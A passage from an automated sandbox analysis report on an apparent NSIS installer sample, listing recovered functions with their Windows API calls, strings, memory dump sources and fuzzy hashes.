                                                                                                                • Opcode Fuzzy Hash: a6b29bbfff6bedb85eff617e0f32f780eda951c653e88163e3cff6ef8cd4870b
                                                                                                                • Instruction Fuzzy Hash: D0217C72800118BFCF116FA5CE4889E7EB9EF09324F24423AF554762E0C6795D81DB68
                                                                                                                APIs
                                                                                                                • WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nscAF7B.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nscAF7B.tmp\System.dll,00000400,?,?,00000021), ref: 00402583
                                                                                                                • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nscAF7B.tmp\System.dll,?,?,C:\Users\user\AppData\Local\Temp\nscAF7B.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nscAF7B.tmp\System.dll,00000400,?,?,00000021), ref: 0040258E
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1990472937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1990457155.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990496635.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990626450.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ByteCharMultiWidelstrlen
                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\nscAF7B.tmp$C:\Users\user\AppData\Local\Temp\nscAF7B.tmp\System.dll
                                                                                                                • API String ID: 3109718747-1554261229
                                                                                                                • Opcode ID: 3d2fa72be5f195c02a17edb7a7abc67028f461df84df2576b51681d351cbf091
                                                                                                                • Instruction ID: 733a5b8a3421de7103486a8e2fd1e7248c9e7ae9f3a69bb90da27b1d5488d101
                                                                                                                • Opcode Fuzzy Hash: 3d2fa72be5f195c02a17edb7a7abc67028f461df84df2576b51681d351cbf091
                                                                                                                • Instruction Fuzzy Hash: E011EB71A01205BBDB10AF718F49A9F3265DF44754F24403BF501F61C2EAFC9D91566D
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2008032542.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2008007393.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2008088602.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2008146266.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_10000000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FreeGlobal
                                                                                                                • String ID:
                                                                                                                • API String ID: 2979337801-0
                                                                                                                • Opcode ID: 2b8b4b1e7525df0b70178d99aec232a76bf74dae3dcdb19d2f86b3abb44108d8
                                                                                                                • Instruction ID: 56de187798276af1e94fdae5c91d23c4da0ac5596926d43ddda2a484f8c4ba85
                                                                                                                • Opcode Fuzzy Hash: 2b8b4b1e7525df0b70178d99aec232a76bf74dae3dcdb19d2f86b3abb44108d8
                                                                                                                • Instruction Fuzzy Hash: 82511336E06115ABFB14DFA488908EEBBF5FF863D0F16406AE801B315DD6706F809792
                                                                                                                APIs
                                                                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00402C20
                                                                                                                • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402C5C
                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00402C65
                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00402C8A
                                                                                                                • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402CA8
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1990472937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1990457155.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990496635.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990626450.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Close$DeleteEnumOpen
                                                                                                                • String ID:
                                                                                                                • API String ID: 1912718029-0
                                                                                                                • Opcode ID: 9537b7928c54e317f26638c763091e9991b3818ca9768273474462c6ff6c3974
                                                                                                                • Instruction ID: 923876515d334741f157c0c1a16b9ae25b0374e488e2a62f99a19aca1c1d50f8
                                                                                                                • Opcode Fuzzy Hash: 9537b7928c54e317f26638c763091e9991b3818ca9768273474462c6ff6c3974
                                                                                                                • Instruction Fuzzy Hash: 4B116A71504119BFEF10AF90DF8CEAE7B79FB54384B10003AF905A11A0D7B49E55AA28
                                                                                                                APIs
                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,10002148,?,00000808), ref: 10001617
                                                                                                                • GlobalAlloc.KERNEL32(?,00000000,?,00000000,10002148,?,00000808), ref: 1000161E
                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,10002148,?,00000808), ref: 10001632
                                                                                                                • GetProcAddress.KERNEL32(10002148,00000000), ref: 10001639
                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 10001642
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2008032542.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2008007393.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2008088602.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2008146266.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_10000000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                                                                                • String ID:
                                                                                                                • API String ID: 1148316912-0
                                                                                                                • Opcode ID: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                                                                                • Instruction ID: 7647a3e7d8fb005f6fbf822ef0874fdc4783f8eaf5d0662476f5196d1f8db515
                                                                                                                • Opcode Fuzzy Hash: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                                                                                • Instruction Fuzzy Hash: 7CF098722071387BE62117A78C8CD9BBF9CDF8B2F5B114215F628921A4C6619D019BF1
                                                                                                                APIs
                                                                                                                • GetDlgItem.USER32(?,?), ref: 00401D00
                                                                                                                • GetClientRect.USER32(00000000,?), ref: 00401D0D
                                                                                                                • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D2E
                                                                                                                • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D3C
                                                                                                                • DeleteObject.GDI32(00000000), ref: 00401D4B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1990472937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1990457155.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990496635.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990626450.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 1849352358-0
                                                                                                                • Opcode ID: 8e0fabd36c2f6d3e7eeae66a254b8168ed1f2a4b1cc3225a820133a00fa4cc9f
                                                                                                                • Instruction ID: e4f3909cb7298d305a77c10ae8325f91f27f48586481a57425ae6c27891e8aa9
                                                                                                                • Opcode Fuzzy Hash: 8e0fabd36c2f6d3e7eeae66a254b8168ed1f2a4b1cc3225a820133a00fa4cc9f
                                                                                                                • Instruction Fuzzy Hash: 8AF0F472600504AFDB01DBE4DE88CEEBBBDEB48311B104476F501F51A1CA74DD018B38
                                                                                                                APIs
                                                                                                                • lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,?,00000000,?,000000DF,00000000,00000400,?), ref: 00404A11
                                                                                                                • wsprintfW.USER32 ref: 00404A1A
                                                                                                                • SetDlgItemTextW.USER32(?,0042D268), ref: 00404A2D
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1990472937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1990457155.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990496635.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990626450.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ItemTextlstrlenwsprintf
                                                                                                                • String ID: %u.%u%s%s
                                                                                                                • API String ID: 3540041739-3551169577
                                                                                                                • Opcode ID: 7f196247ffa4f5a533f026148308de82019fe3f3f4a3a426db09a444c3bfa401
                                                                                                                • Instruction ID: def2e14d0b5e9bf745060eb8ff4f21dbd1799345f736686a8e00f38c04d15d9e
                                                                                                                • Opcode Fuzzy Hash: 7f196247ffa4f5a533f026148308de82019fe3f3f4a3a426db09a444c3bfa401
                                                                                                                • Instruction Fuzzy Hash: 3811EBB3A441287BDB10957D9C46EAF329C9B85374F250237FA65F31D1D978CC2182E8
                                                                                                                APIs
                                                                                                                • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C3F
                                                                                                                • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C57
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1990472937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1990457155.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990496635.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990626450.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$Timeout
                                                                                                                • String ID: !
                                                                                                                • API String ID: 1777923405-2657877971
                                                                                                                • Opcode ID: bb3cfb28f78b001f2c6e024d0600213de5f72616f9f3d873aed837dd9dfd9417
                                                                                                                • Instruction ID: e3aefc4fd96fc6be6e01b9b250019d2d880820bae5141952ee5ed295407643d5
                                                                                                                • Opcode Fuzzy Hash: bb3cfb28f78b001f2c6e024d0600213de5f72616f9f3d873aed837dd9dfd9417
                                                                                                                • Instruction Fuzzy Hash: DA219071940209BEEF01AFB4CE4AABE7B75EB44344F10403EF601B61D1D6B89A409B68
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00406055: lstrcpynW.KERNEL32(0040A300,0040A300,00000400,00403350,00433F00,NSIS Error), ref: 00406062
                                                                                                                  • Part of subcall function 00405AB4: CharNextW.USER32(?,?,0042FA70,0040A300,00405B28,0042FA70,0042FA70, 4Wu,?,C:\Users\user\AppData\Local\Temp\,00405866,?,75573420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\ppISxhDcpF.exe"), ref: 00405AC2
                                                                                                                  • Part of subcall function 00405AB4: CharNextW.USER32(00000000), ref: 00405AC7
                                                                                                                  • Part of subcall function 00405AB4: CharNextW.USER32(00000000), ref: 00405ADF
                                                                                                                • lstrlenW.KERNEL32(0042FA70,00000000,0042FA70,0042FA70, 4Wu,?,C:\Users\user\AppData\Local\Temp\,00405866,?,75573420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\ppISxhDcpF.exe"), ref: 00405B6A
                                                                                                                • GetFileAttributesW.KERNEL32(0042FA70,0042FA70,0042FA70,0042FA70,0042FA70,0042FA70,00000000,0042FA70,0042FA70, 4Wu,?,C:\Users\user\AppData\Local\Temp\,00405866,?,75573420,C:\Users\user\AppData\Local\Temp\), ref: 00405B7A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1990472937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1990457155.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990496635.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990626450.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                                • String ID: 4Wu$C:\Users\user\AppData\Local\Temp\
                                                                                                                • API String ID: 3248276644-3057243036
                                                                                                                • Opcode ID: c6e1c51320233fe3a8d28f86eff4fa9f75d9a909d4c49901629be8da40a5a1bd
                                                                                                                • Instruction ID: 9ab821bc962df094d04e13ee53e7cef05d0bc350337be3d6547239d71e0b1b07
                                                                                                                • Opcode Fuzzy Hash: c6e1c51320233fe3a8d28f86eff4fa9f75d9a909d4c49901629be8da40a5a1bd
                                                                                                                • Instruction Fuzzy Hash: FFF0A429504E5115D72272361D49EBF3669CF86324B1A063FF852B22D1DB3CB952CCBD
                                                                                                                APIs
                                                                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,00000002,Call,?,00406195,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405F4C
                                                                                                                • RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,?,?,00406195,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405F6D
                                                                                                                • RegCloseKey.ADVAPI32(?,?,00406195,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405F90
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1990472937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1990457155.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990496635.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990626450.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseOpenQueryValue
                                                                                                                • String ID: Call
                                                                                                                • API String ID: 3677997916-1824292864
                                                                                                                • Opcode ID: dc8238eba50b6a515ffb3eaa529f07d06f955d85da5af348ba8f56d7e8cd44ce
                                                                                                                • Instruction ID: 7b18913d2a4f7d1a63d21b64be8b0843a819b9ea39c2317e7442ba644687e02f
                                                                                                                • Opcode Fuzzy Hash: dc8238eba50b6a515ffb3eaa529f07d06f955d85da5af348ba8f56d7e8cd44ce
                                                                                                                • Instruction Fuzzy Hash: 1801483110060AAECB218F66ED08EAB3BA8EF94350F01402AFD44D2260D734D964CBA5
                                                                                                                APIs
                                                                                                                • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040328D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 00405A0F
                                                                                                                • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040328D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 00405A19
                                                                                                                • lstrcatW.KERNEL32(?,0040A014), ref: 00405A2B
                                                                                                                Strings
                                                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00405A09
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1990472937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1990457155.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990496635.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990626450.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CharPrevlstrcatlstrlen
                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                • API String ID: 2659869361-4083868402
                                                                                                                • Opcode ID: 69ce20dac70bd98cff0fbc611a97eee619d910519d07cd3d76554ab653056bec
                                                                                                                • Instruction ID: 6c4fcacab342d11fcc3e0291a3358bee332e4b98312e181ff459d3a43eef6c86
                                                                                                                • Opcode Fuzzy Hash: 69ce20dac70bd98cff0fbc611a97eee619d910519d07cd3d76554ab653056bec
                                                                                                                • Instruction Fuzzy Hash: E4D0A771101D306AC211EB548C04DDF72ACAE45344381007BF502B30E1CB7C1D618BFE
                                                                                                                APIs
                                                                                                                  • Part of subcall function 004051B4: lstrlenW.KERNEL32(0042C248,00000000,0041D820,755723A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051EC
                                                                                                                  • Part of subcall function 004051B4: lstrlenW.KERNEL32(0040318B,0042C248,00000000,0041D820,755723A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051FC
                                                                                                                  • Part of subcall function 004051B4: lstrcatW.KERNEL32(0042C248,0040318B,0040318B,0042C248,00000000,0041D820,755723A0), ref: 0040520F
                                                                                                                  • Part of subcall function 004051B4: SetWindowTextW.USER32(0042C248,0042C248), ref: 00405221
                                                                                                                  • Part of subcall function 004051B4: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405247
                                                                                                                  • Part of subcall function 004051B4: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405261
                                                                                                                  • Part of subcall function 004051B4: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526F
                                                                                                                  • Part of subcall function 00405735: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430270,Error launching installer), ref: 0040575E
                                                                                                                  • Part of subcall function 00405735: CloseHandle.KERNEL32(0040A300), ref: 0040576B
                                                                                                                • WaitForSingleObject.KERNEL32(00000000,?,00000000,000000EB,00000000), ref: 00401E95
                                                                                                                • WaitForSingleObject.KERNEL32(?,?,0000000F), ref: 00401EAA
                                                                                                                • GetExitCodeProcess.KERNEL32(?,?), ref: 00401EB7
                                                                                                                • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EDE
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1990472937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1990457155.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990496635.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990626450.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
                                                                                                                • String ID:
                                                                                                                • API String ID: 3585118688-0
                                                                                                                • Opcode ID: b55d93dfb97ddf8a14339bcde7d47e4fb5e20aa6c656398e0056b6fada52b68e
                                                                                                                • Instruction ID: 13991b0c54685da06ec2ee4a2e862f8a6615163aea1ca29b4ebe34551147a3b8
                                                                                                                • Opcode Fuzzy Hash: b55d93dfb97ddf8a14339bcde7d47e4fb5e20aa6c656398e0056b6fada52b68e
                                                                                                                • Instruction Fuzzy Hash: DE116131900508EBCF21AFA1CD459AE7BB6EF44354F24403BF901BA1E1D7798A919B9D
                                                                                                                APIs
                                                                                                                • DestroyWindow.USER32(00000000,00000000,00402F6A,00000001,?,?,00000000,0040353A,?), ref: 00402D9D
                                                                                                                • GetTickCount.KERNEL32 ref: 00402DBB
                                                                                                                • CreateDialogParamW.USER32(0000006F,00000000,00402D04,00000000), ref: 00402DD8
                                                                                                                • ShowWindow.USER32(00000000,00000005,?,?,00000000,0040353A,?), ref: 00402DE6
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1990472937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1990457155.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990496635.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990626450.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                • String ID:
                                                                                                                • API String ID: 2102729457-0
                                                                                                                • Opcode ID: 4531d39793dd689b88ecf9c78e53bc84b8350a2634ed7edc8c543d9bb047c671
                                                                                                                • Instruction ID: 14797c98da9828bb931948049190d252b5e763d0d3dd0a8fb7bf7e32741345ac
                                                                                                                • Opcode Fuzzy Hash: 4531d39793dd689b88ecf9c78e53bc84b8350a2634ed7edc8c543d9bb047c671
                                                                                                                • Instruction Fuzzy Hash: C9F05430611A20BFC6716B50FF4D98B7B64BB84B11701457AF142B15E8CBB80C418B9C
                                                                                                                APIs
                                                                                                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430270,Error launching installer), ref: 0040575E
                                                                                                                • CloseHandle.KERNEL32(0040A300), ref: 0040576B
                                                                                                                Strings
                                                                                                                • Error launching installer, xrefs: 00405748
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1990472937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
